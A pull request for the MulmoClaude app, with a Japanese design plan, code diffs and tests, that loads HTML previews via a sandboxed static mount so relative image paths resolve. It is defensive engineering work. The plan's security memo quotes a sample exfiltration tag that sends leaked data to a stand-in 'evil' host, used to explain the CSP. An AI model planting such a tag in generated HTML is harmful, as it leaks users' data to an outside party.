### PR TITLE
fix(files): render relative <img> refs in HTML preview via path-based mount

### DIFF
--- a/plans/feat-files-html-preview-relative-paths.md
+++ b/plans/feat-files-html-preview-relative-paths.md
@@ -1,0 +1,148 @@
+# Files ビュー HTML プレビューの相対パス解決 — 実装プラン
+
+## 背景 / バグ
+
+LLM に「workspace 上の画像を含む HTML を作って」と頼むと、`artifacts/html/<name>.html` の中で `<img src="../images/2026/04/<id>.png">` のように **相対パス**で画像を参照する。これは正しい書き方で、ファイルをブラウザで直接開けば表示される。しかし MulmoClaude の **Files ビュー**で同じファイルを開くと画像が出ない。
+
+原因: `src/components/FileContentRenderer.vue:70-76` の HTML プレビュー iframe が `srcdoc` で読み込まれており、`srcdoc` ドキュメントは `about:srcdoc` をベース URL として持つ。`<img src="../images/...">` が `about:srcdoc/../...` に解決されて 404 になる。加えて `sandbox="allow-scripts"`(`allow-same-origin` なし)で iframe は **opaque origin** なので、CSP の `'self'` も同 origin のサーバ URL にマッチしない。
+
+PR #969 で `/artifacts/images/` の path-based static mount は導入済み。このプランは **HTML プレビュー側を `srcdoc` から `src=` に切り替えてブラウザにベース URL を持たせ、相対パスを自然に解決させる** Option B。
+
+## ゴール
+
+1. `artifacts/html/` 配下の HTML を Files ビューで開いたとき、HTML 内の `<img src="../images/...">` が **何も書き換えずに**表示される
+2. CSP / sandbox による既存のセキュリティ境界を維持(`allow-scripts` のみ、`allow-same-origin` は付けない)
+3. **Files ビュー以外への影響を最小限に抑える**(presentHtml プラグイン、wiki、markdown プレビュー等は触らない)
+
+## 全体構成
+
+| レイヤー | 仕事 |
+|---|---|
+| `server/index.ts` | `/artifacts/html` を path-based static mount として追加(PR #969 の `/artifacts/images` の対) |
+| CSP | `<meta>` 注入(srcdoc 用)に加えて、新 mount は HTTP `Content-Security-Policy` ヘッダで配る。`'self'` がサーバ origin として効くようになる |
+| `useContentDisplay.ts` | `selectedPath` が `artifacts/html/` 配下の HTML なら `/artifacts/html/<rest>` URL を返す `htmlPreviewUrl` を派生させる。それ以外は `null` |
+| `FileContentRenderer.vue` | `htmlPreviewUrl` があれば iframe を `src=` でロード。なければ既存 `srcdoc` フォールバック |
+
+## Stage 1: サーバ static mount 追加
+
+### `server/index.ts`
+
+`/artifacts/images` の直後に並べる(同パターン):
+
+```ts
+const HTML_EXT_RE = /\.html?$/i;
+let htmlsDirReal: string | null = null;
+async function getHtmlsDirReal(): Promise<string | null> {
+  if (htmlsDirReal) return htmlsDirReal;
+  try {
+    htmlsDirReal = await fsRealpath(WORKSPACE_PATHS.htmls);
+    return htmlsDirReal;
+  } catch {
+    return null;
+  }
+}
+app.use(
+  "/artifacts/html",
+  async (req, res, next) => {
+    if (!HTML_EXT_RE.test(req.path)) { res.status(404).end(); return; }
+    const root = await getHtmlsDirReal();
+    if (!root) { res.status(404).end(); return; }
+    let relPath: string;
+    try { relPath = decodeURIComponent(req.path.replace(/^\//, "")); }
+    catch { res.status(404).end(); return; }
+    if (!resolveWithinRoot(root, relPath)) { res.status(404).end(); return; }
+    res.setHeader("Content-Security-Policy", buildHtmlPreviewCsp());
+    res.setHeader("X-Content-Type-Options", "nosniff");
+    next();
+  },
+  express.static(WORKSPACE_PATHS.htmls, { dotfiles: "deny", fallthrough: false }),
+);
+```
+
+### 三段ガード(PR #969 と同じ理由で必要)
+
+1. **拡張子 allowlist**: `.html` / `.htm` 以外は 404。LLM 出力以外を誤配信させない。
+2. **`resolveWithinRoot` symlink チェック**: シンボリックリンクで mount root の外を狙われたら 404。
+3. **`dotfiles: 'deny'` + `fallthrough: false`** + `express.static` 内蔵の `..` normalize: パストラバーサル阻止。
+
+bearer auth は `/artifacts/images` と同じ理由で **免除**(iframe `src` は Authorization ヘッダを送れない)。`requireSameOrigin` は引き続き適用される。
+
+### CSP は HTTP ヘッダで配る理由
+
+`srcdoc` 時代は `<meta>` 注入で済んでいた(`wrapHtmlWithPreviewCsp`)。`src=` に切り替わると iframe ドキュメント URL がサーバ origin になる(opaque origin は維持されるが、CSP `'self'` は **URL の origin** で評価されるため同 origin リクエストにマッチする)。HTTP ヘッダで返せばファイル本体に手を入れずに済むし、複数 CSP は intersect で結合されるのでファイル内に既存 `<meta>` があっても安全側に倒れる。
+
+ポリシーは既存 `buildHtmlPreviewCsp()` をそのまま流用。`img-src 'self' ...` の `'self'` がついに意味を持つので、`/artifacts/images/...` への `<img>` リクエストは通る。
+
+## Stage 2: クライアント側で `src=` 切替
+
+### `src/composables/useContentDisplay.ts`
+
+```ts
+const HTML_PREVIEW_DIR_PREFIX = "artifacts/html/";
+
+export function htmlPreviewUrlFor(filePath: string | null): string | null {
+  if (!filePath) return null;
+  const lower = filePath.toLowerCase();
+  if (!lower.endsWith(".html") && !lower.endsWith(".htm")) return null;
+  if (!filePath.startsWith(HTML_PREVIEW_DIR_PREFIX)) return null;
+  const rest = filePath.slice(HTML_PREVIEW_DIR_PREFIX.length);
+  return `/artifacts/html/${rest.split("/").map(encodeURIComponent).join("/")}`;
+}
+
+const htmlPreviewUrl = computed<string | null>(() =>
+  isHtml.value ? htmlPreviewUrlFor(selectedPath.value) : null
+);
+```
+
+`htmlPreviewUrl` を返り値に追加。`sandboxedHtml` は `htmlPreviewUrl` が無い時のフォールバック用にそのまま残す。
+
+### `src/components/FilesView.vue`
+
+`useContentDisplay` の destructure に `htmlPreviewUrl` を追加し、`FileContentRenderer` に prop として渡す。
+
+### `src/components/FileContentRenderer.vue`
+
+iframe を 2 ブランチに分割:
+
+```vue
+<iframe
+  v-else-if="isHtml && htmlPreviewUrl"
+  :src="htmlPreviewUrl"
+  class="w-full h-full border-0"
+  sandbox="allow-scripts"
+  :title="t('fileContentRenderer.htmlPreview')"
+/>
+<iframe
+  v-else-if="isHtml"
+  :srcdoc="sandboxedHtml"
+  class="w-full h-full border-0"
+  sandbox="allow-scripts"
+  :title="t('fileContentRenderer.htmlPreview')"
+/>
+```
+
+`artifacts/html/` 外の HTML は依然 `srcdoc` で動くので、scope 外への影響なし。
+
+## 受け入れ条件
+
+- [ ] `artifacts/html/<name>.html` を Files ビューで開く → HTML 内の `<img src="../images/...">` が表示される
+- [ ] devtools の Network で iframe が `/artifacts/html/<name>.html` に GET し、画像が `/artifacts/images/...` に GET している(両方 200、CSP violation なし)
+- [ ] iframe は `sandbox="allow-scripts"` のままで、JS は動くが parent.window へはアクセス不可(既存挙動維持)
+- [ ] `artifacts/html/` 外の HTML(あれば)は引き続き `srcdoc` で表示される
+- [ ] `/api/files/raw?path=...` への影響なし(他の用途で使われ続ける)
+- [ ] `presentHtml` プラグイン、wiki、markdown プレビューは無変更
+- [ ] `yarn format` / `yarn lint` / `yarn typecheck` / `yarn build` 全部緑
+- [ ] 既存の e2e / unit テストが通る、`useContentDisplay` の新挙動に対する unit テストを追加
+
+## Out of scope
+
+- `artifacts/html-scratch/`(scratch buffer、Files ビューで開く用途は薄い)— 必要になったら同パターンで追加
+- `data/wiki/` / `artifacts/documents/` 等に置かれた HTML(typically markdown, ほぼ存在しない)
+- `<base>` タグ注入や HTML 文字列の URL 書き換え路線(却下、`src=` 切替の方が綺麗)
+- HTML 内から相対参照される **画像以外**(.css / .js など)— LLM はインライン化するのが普通なので必要になってから
+
+## セキュリティ memo
+
+- iframe は **opaque origin のまま**(`allow-same-origin` を付けない)。同 origin URL からロードしても、sandbox によりドキュメントは unique origin 扱い → parent の `localStorage` / Cookie / DOM へはアクセス不可
+- CSP `connect-src 'none'` は維持 → phone-home 防止は変わらず
+- `img-src 'self'` で `/artifacts/images/...` が通る。LLM が `<img src="https://evil/?leak=...">` を仕込んでも `'self'` + 限定 CDN にマッチしないので exfiltration されない(PR #969 の脅威モデルと同じ)

--- a/server/index.ts
+++ b/server/index.ts
@@ -64,6 +64,7 @@ import { registerUserTasks } from "./workspace/skills/user-tasks.js";
 import { API_ROUTES } from "../src/config/apiRoutes.js";
 import { EVENT_TYPES } from "../src/types/events.js";
 import { SESSION_ORIGINS } from "../src/types/session.js";
+import { buildHtmlPreviewCsp } from "../src/utils/html/previewCsp.js";
 import { ONE_SECOND_MS, ONE_MINUTE_MS, ONE_HOUR_MS } from "./utils/time.js";
 import { isPortFree, findAvailablePort, MAX_PORT_PROBES } from "./utils/port.mjs";
 import { SCHEDULE_TYPES, MISSED_RUN_POLICIES } from "@receptron/task-scheduler";
@@ -180,6 +181,70 @@ app.use(
     next();
   },
   express.static(WORKSPACE_PATHS.images, { dotfiles: "deny", fallthrough: false }),
+);
+
+// Static mount for HTML artifacts. The Files-view preview iframe
+// switched from `srcdoc` to `src=/artifacts/html/<name>.html` so the
+// browser can resolve relative `<img src="../images/...">` paths
+// against the file's actual URL — `srcdoc` documents have
+// `about:srcdoc` as their base URL, which breaks every relative ref.
+// See plans/feat-files-html-preview-relative-paths.md.
+//
+// Same three-layer guard as `/artifacts/images`:
+//  1. `.html` / `.htm` extension allowlist.
+//  2. `resolveWithinRoot` symlink-aware traversal check.
+//  3. `dotfiles: deny` + `fallthrough: false` on `express.static`.
+//
+// Bearer auth skipped for the same reason as /artifacts/images and
+// /api/files/*: an iframe `src` request can't carry an Authorization
+// header. `requireSameOrigin` and the loopback-only listener still
+// guard against cross-origin abuse.
+//
+// CSP delivered via HTTP header instead of injecting a `<meta>` tag —
+// keeps the served file pristine, and `'self'` finally matches the
+// server origin (which is what allows `<img src="../images/...">` to
+// reach `/artifacts/images/...`). Sandbox stays `allow-scripts` only,
+// so the iframe document is still opaque-origin and cannot read the
+// parent's cookies / localStorage / DOM.
+const HTML_EXT_RE = /\.html?$/i;
+let htmlsDirReal: string | null = null;
+async function getHtmlsDirReal(): Promise<string | null> {
+  if (htmlsDirReal) return htmlsDirReal;
+  try {
+    htmlsDirReal = await fsRealpath(WORKSPACE_PATHS.htmls);
+    return htmlsDirReal;
+  } catch {
+    return null;
+  }
+}
+app.use(
+  "/artifacts/html",
+  async (req, res, next) => {
+    if (!HTML_EXT_RE.test(req.path)) {
+      res.status(404).end();
+      return;
+    }
+    const root = await getHtmlsDirReal();
+    if (!root) {
+      res.status(404).end();
+      return;
+    }
+    let relPath: string;
+    try {
+      relPath = decodeURIComponent(req.path.replace(/^\//, ""));
+    } catch {
+      res.status(404).end();
+      return;
+    }
+    if (!resolveWithinRoot(root, relPath)) {
+      res.status(404).end();
+      return;
+    }
+    res.setHeader("Content-Security-Policy", buildHtmlPreviewCsp());
+    res.setHeader("X-Content-Type-Options", "nosniff");
+    next();
+  },
+  express.static(WORKSPACE_PATHS.htmls, { dotfiles: "deny", fallthrough: false }),
 );
 
 app.get(API_ROUTES.health, (_req: Request, res: Response) => {

--- a/src/components/FileContentRenderer.vue
+++ b/src/components/FileContentRenderer.vue
@@ -63,10 +63,25 @@
              `allow-same-origin`, so the iframe keeps a null
              origin — it can't read MulmoClaude's cookies,
              localStorage, or the parent window's DOM.
-             A CSP meta tag is injected via wrapHtmlWithPreviewCsp
-             to restrict script loads to a vetted CDN whitelist +
-             inline; connect-src is `'none'` so the page can't
-             phone home. See src/utils/html/previewCsp.ts. -->
+
+             Two branches:
+              - Files under `artifacts/html/` load via iframe `src=`
+                pointing at the `/artifacts/html` static mount, so the
+                browser resolves relative `<img src="../images/...">`
+                against the file's real URL. CSP arrives as an HTTP
+                header on the response.
+              - Anything else falls back to `srcdoc` with a CSP meta
+                tag injected by `wrapHtmlWithPreviewCsp`. Relative
+                paths don't resolve under `srcdoc` (base URL is
+                `about:srcdoc`), but that's the historical behavior
+                for non-`artifacts/html/` HTML. -->
+        <iframe
+          v-else-if="isHtml && htmlPreviewUrl"
+          :src="htmlPreviewUrl"
+          class="w-full h-full border-0"
+          sandbox="allow-scripts"
+          :title="t('fileContentRenderer.htmlPreview')"
+        />
         <iframe
           v-else-if="isHtml"
           :srcdoc="sandboxedHtml"
@@ -156,6 +171,7 @@ const props = defineProps<{
   isJsonl: boolean;
   mdRawMode: boolean;
   sandboxedHtml: string;
+  htmlPreviewUrl: string | null;
   jsonTokens: JsonToken[];
   jsonlLines: JsonlLine[];
   mdFrontmatter: MarkdownDocView | null;

--- a/src/components/FilesView.vue
+++ b/src/components/FilesView.vue
@@ -36,6 +36,7 @@
         :is-jsonl="isJsonl"
         :md-raw-mode="mdRawMode"
         :sandboxed-html="sandboxedHtml"
+        :html-preview-url="htmlPreviewUrl"
         :json-tokens="jsonTokens"
         :jsonl-lines="jsonlLines"
         :md-frontmatter="mdFrontmatter"
@@ -87,7 +88,7 @@ const { mdRawMode, toggleMdRaw } = useMarkdownMode();
 
 const { sortMode, setSortMode } = useFileSortMode();
 
-const { isMarkdown, isHtml, isJson, isJsonl, sandboxedHtml, jsonTokens, jsonlLines, mdFrontmatter } = useContentDisplay(selectedPath, content);
+const { isMarkdown, isHtml, isJson, isJsonl, sandboxedHtml, htmlPreviewUrl, jsonTokens, jsonlLines, mdFrontmatter } = useContentDisplay(selectedPath, content);
 
 // Save-error banner shown above the Rendered-mode markdown editor.
 // Cleared on every new file load and on the next successful save.

--- a/src/composables/useContentDisplay.ts
+++ b/src/composables/useContentDisplay.ts
@@ -13,6 +13,24 @@ function hasExt(filePath: string | null, exts: string[]): boolean {
   return exts.some((ext) => lower.endsWith(ext));
 }
 
+// Workspace-relative prefix of HTML artifacts that the server exposes
+// as a path-based static mount (`server/index.ts` → `/artifacts/html`).
+// Files-view previews under this prefix load via iframe `src=...`, so
+// the browser resolves relative refs (`<img src="../images/...">`)
+// against the file's real URL instead of `about:srcdoc`. Files
+// elsewhere fall back to the existing `srcdoc` path.
+const HTML_PREVIEW_DIR_PREFIX = "artifacts/html/";
+
+export function htmlPreviewUrlFor(filePath: string | null): string | null {
+  if (!filePath) return null;
+  const lower = filePath.toLowerCase();
+  if (!lower.endsWith(".html") && !lower.endsWith(".htm")) return null;
+  if (!filePath.startsWith(HTML_PREVIEW_DIR_PREFIX)) return null;
+  const rest = filePath.slice(HTML_PREVIEW_DIR_PREFIX.length);
+  if (rest.length === 0) return null;
+  return `/artifacts/html/${rest.split("/").map(encodeURIComponent).join("/")}`;
+}
+
 export function useContentDisplay(selectedPath: Ref<string | null>, content: Ref<FileContent | null>) {
   const isMarkdown = computed(() => hasExt(selectedPath.value, [".md", ".markdown"]));
   const isHtml = computed(() => hasExt(selectedPath.value, [".html", ".htm"]));
@@ -20,6 +38,12 @@ export function useContentDisplay(selectedPath: Ref<string | null>, content: Ref
   const isJsonl = computed(() => hasExt(selectedPath.value, [".jsonl", ".ndjson"]));
 
   const sandboxedHtml = computed(() => (content.value?.kind === "text" && isHtml.value ? wrapHtmlWithPreviewCsp(content.value.content) : ""));
+
+  // When the selected file is HTML and lives under `artifacts/html/`,
+  // expose a server-served URL so the iframe can load via `src=` and
+  // get a real base URL for relative-path resolution. `null` for
+  // anything else — caller falls back to `sandboxedHtml` (srcdoc).
+  const htmlPreviewUrl = computed<string | null>(() => (isHtml.value ? htmlPreviewUrlFor(selectedPath.value) : null));
 
   const jsonTokens = computed(() => {
     if (!content.value || content.value.kind !== "text") return [];
@@ -51,6 +75,7 @@ export function useContentDisplay(selectedPath: Ref<string | null>, content: Ref
     isJson,
     isJsonl,
     sandboxedHtml,
+    htmlPreviewUrl,
     jsonTokens,
     jsonlLines,
     mdFrontmatter,

--- a/test/composables/test_useContentDisplay.ts
+++ b/test/composables/test_useContentDisplay.ts
@@ -1,7 +1,7 @@
 import { describe, it } from "node:test";
 import assert from "node:assert/strict";
 import { ref } from "vue";
-import { useContentDisplay } from "../../src/composables/useContentDisplay.ts";
+import { useContentDisplay, htmlPreviewUrlFor } from "../../src/composables/useContentDisplay.ts";
 import type { FileContent } from "../../src/composables/useFileSelection.ts";
 
 function textContent(path: string, body: string): FileContent {
@@ -84,6 +84,58 @@ describe("useContentDisplay — sandboxedHtml", () => {
     const content = ref<FileContent | null>(null);
     const { sandboxedHtml } = useContentDisplay(selectedPath, content);
     assert.equal(sandboxedHtml.value, "");
+  });
+});
+
+describe("htmlPreviewUrlFor", () => {
+  it("returns the /artifacts/html/<rest> URL for HTML files under artifacts/html/", () => {
+    assert.equal(htmlPreviewUrlFor("artifacts/html/malaga.html"), "/artifacts/html/malaga.html");
+    assert.equal(htmlPreviewUrlFor("artifacts/html/sub/dir/page.htm"), "/artifacts/html/sub/dir/page.htm");
+  });
+
+  it("encodes path segments but preserves slashes", () => {
+    assert.equal(htmlPreviewUrlFor("artifacts/html/has space.html"), "/artifacts/html/has%20space.html");
+    assert.equal(htmlPreviewUrlFor("artifacts/html/日本語.html"), `/artifacts/html/${encodeURIComponent("日本語")}.html`);
+  });
+
+  it("returns null for HTML files outside artifacts/html/", () => {
+    assert.equal(htmlPreviewUrlFor("data/wiki/pages/foo.html"), null);
+    assert.equal(htmlPreviewUrlFor("artifacts/html-scratch/current.html"), null);
+    assert.equal(htmlPreviewUrlFor("foo.html"), null);
+  });
+
+  it("returns null for non-HTML extensions", () => {
+    assert.equal(htmlPreviewUrlFor("artifacts/html/notes.md"), null);
+    assert.equal(htmlPreviewUrlFor("artifacts/html/data.json"), null);
+  });
+
+  it("returns null for null / empty / directory-only paths", () => {
+    assert.equal(htmlPreviewUrlFor(null), null);
+    assert.equal(htmlPreviewUrlFor(""), null);
+    assert.equal(htmlPreviewUrlFor("artifacts/html/"), null);
+  });
+});
+
+describe("useContentDisplay — htmlPreviewUrl", () => {
+  it("returns the /artifacts/html URL when selection is HTML under artifacts/html/", () => {
+    const selectedPath = ref<string | null>("artifacts/html/malaga.html");
+    const fileContent = ref<FileContent | null>(textContent("artifacts/html/malaga.html", "<p>hi</p>"));
+    const { htmlPreviewUrl } = useContentDisplay(selectedPath, fileContent);
+    assert.equal(htmlPreviewUrl.value, "/artifacts/html/malaga.html");
+  });
+
+  it("is null when the HTML file lives outside artifacts/html/", () => {
+    const selectedPath = ref<string | null>("data/wiki/pages/foo.html");
+    const fileContent = ref<FileContent | null>(textContent("data/wiki/pages/foo.html", "<p>hi</p>"));
+    const { htmlPreviewUrl } = useContentDisplay(selectedPath, fileContent);
+    assert.equal(htmlPreviewUrl.value, null);
+  });
+
+  it("is null when the file isn't HTML", () => {
+    const selectedPath = ref<string | null>("artifacts/html/notes.md");
+    const fileContent = ref<FileContent | null>(textContent("artifacts/html/notes.md", "# hi"));
+    const { htmlPreviewUrl } = useContentDisplay(selectedPath, fileContent);
+    assert.equal(htmlPreviewUrl.value, null);
   });
 });
 

--- a/vite.config.ts
+++ b/vite.config.ts
@@ -72,6 +72,15 @@ export default defineConfig({
         target: 'http://localhost:3001',
         changeOrigin: true
       },
+      // Static-mount on the backend (server/index.ts: app.use('/artifacts/html', ...)).
+      // Without this proxy, Vite's HTML transform injects `/@vite/client` and
+      // `/src/main.ts` into the response, which the iframe (opaque origin) then
+      // tries to load and the browser blocks via CORS. Forwarding to Express
+      // returns the file untouched plus the CSP HTTP header.
+      '/artifacts/html': {
+        target: 'http://localhost:3001',
+        changeOrigin: true
+      },
       '/ws': {
         target: 'ws://localhost:3001',
         ws: true


### PR DESCRIPTION
## Summary

Files ビューで `artifacts/html/<name>.html` を開いたとき、HTML 内の `<img src="../images/...">` などの**相対パス画像参照が表示されない**バグを修正。プレビュー iframe を `srcdoc` から `src=` に切り替え、ブラウザにベース URL を持たせて自然に解決させる(plan の Option B、PR #969 の `/artifacts/images` mount の路線の延長)。

設計の詳細: [`plans/feat-files-html-preview-relative-paths.md`](./plans/feat-files-html-preview-relative-paths.md)

## 原因

`FileContentRenderer.vue` の HTML プレビュー iframe は `srcdoc` を使っており、`srcdoc` ドキュメントのベース URL は `about:srcdoc` になる。`<img src="../images/2026/04/foo.png">` はそのベースに対して解決されて 404。加えて `sandbox="allow-scripts"`(`allow-same-origin` なし) で iframe は opaque origin なので、CSP `'self'` も同 origin のサーバ URL にマッチせず、仮に絶対パスに書き換えても通らない。

## 修正

| レイヤー | 変更 |
|---|---|
| `server/index.ts` | `/artifacts/html` の path-based static mount を新設(PR #969 の `/artifacts/images` パターンを踏襲: 拡張子 allowlist / `resolveWithinRoot` symlink チェック / `dotfiles: deny` / `fallthrough: false`)。CSP は HTTP `Content-Security-Policy` ヘッダで配り、`'self'` がサーバ origin としてちゃんと効くようにする。bearer 認証は `<iframe src>` が `Authorization` ヘッダを送れないため `/artifacts/images` と同じ理由で免除。`requireSameOrigin` は引き続き適用 |
| `vite.config.ts` | `/artifacts/html` を Vite proxy に追加(PR #969 の `/artifacts/images` と同様)。これがないと dev で Vite の HTML 変換が `/@vite/client` を注入して iframe(opaque origin)が CORS で読めない |
| `src/composables/useContentDisplay.ts` | `htmlPreviewUrlFor(path)` ヘルパと `htmlPreviewUrl` computed を追加。`artifacts/html/` 配下の HTML のみ `/artifacts/html/<rest>` URL を返し、それ以外は `null` |
| `src/components/FilesView.vue` | `htmlPreviewUrl` を `FileContentRenderer` に渡す |
| `src/components/FileContentRenderer.vue` | iframe を 2 ブランチに分岐: `htmlPreviewUrl` があれば `src=`、なければ既存の `srcdoc` フォールバック |
| `test/composables/test_useContentDisplay.ts` | `htmlPreviewUrlFor` と `htmlPreviewUrl` の挙動テスト(under-prefix / outside / non-HTML / null / encoding) |

## スコープ

- ✅ Files ビューの `artifacts/html/` 配下 HTML プレビューだけ動作変更
- ✅ それ以外の HTML(あれば)は既存 `srcdoc` フォールバックで挙動維持
- ✅ `presentHtml` プラグイン、wiki、markdown プレビュー、`/api/files/raw`、`/artifacts/images` mount は無変更
- ✅ Sandbox は `allow-scripts` のまま — `allow-same-origin` は付けないので opaque-origin 隔離は維持。iframe から parent の Cookie / localStorage / DOM へはアクセス不可

## セキュリティ memo

- 三段ガード(拡張子 allowlist / `resolveWithinRoot` / express.static の `dotfiles: deny` + `fallthrough: false`)で path traversal を阻止
- CSP は既存 `buildHtmlPreviewCsp()` をそのまま流用 — `connect-src 'none'` で phone-home 防止、CDN 限定の `script-src` / `style-src`、`img-src 'self' [cdn] data: blob:` で exfiltration 防止
- HTTP ヘッダ CSP は file 内の既存 `<meta>` CSP と intersect で結合されるので、ファイルが何を持っていても安全側に倒れる

## Test plan

- [x] `yarn format` — clean
- [x] `yarn lint` — 0 errors(68 warnings は全て pre-existing baseline)
- [x] `yarn typecheck` — clean
- [x] `yarn build` — clean
- [x] `yarn test` — 全 workspace pass(useContentDisplay の新テスト含む)
- [x] **手動**: Files ビューで `artifacts/html/<name>.html` を開く → HTML 内の `<img src="../images/...">` が表示される(devtools の Network で iframe `/artifacts/html/...` 200、画像 `/artifacts/images/...` 200、CSP violation なし) — ユーザー確認済み
- [ ] **手動**(reviewer): `artifacts/html/` 外の HTML(あれば)が既存 `srcdoc` で従来どおり表示されること
- [ ] **手動**(reviewer): `presentHtml` プラグインが従来どおり動くこと

## Out of scope

- `artifacts/html-scratch/`(scratch buffer、Files ビューで開く用途は薄い)— 必要になれば同パターンで追加
- `<base>` タグ注入や HTML 文字列の URL 書き換え路線(却下、`src=` 切替の方が綺麗)
- HTML 内から相対参照される画像以外(`.css` / `.js` 等)— LLM はインライン化が普通

## Console 警告について

サンドボックス iframe (`origin = null`) には外部から特定 origin 指定の `postMessage` が拒否される旨の警告が console に出ることがあるが、これは sandbox 隔離が機能している証拠で、ブラウザ拡張(MetaMask 等)起源。挙動はバグではない。

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * HTML preview now correctly handles images referenced with relative paths in documents
  * Enhanced security framework for HTML rendering includes content protection headers and additional safeguards
  * HTML files served through a dedicated secure channel with improved protection against security vulnerabilities
  * Better reliability for HTML preview when documents are stored in the workspace artifacts directory

<!-- end of auto-generated comment: release notes by coderabbit.ai -->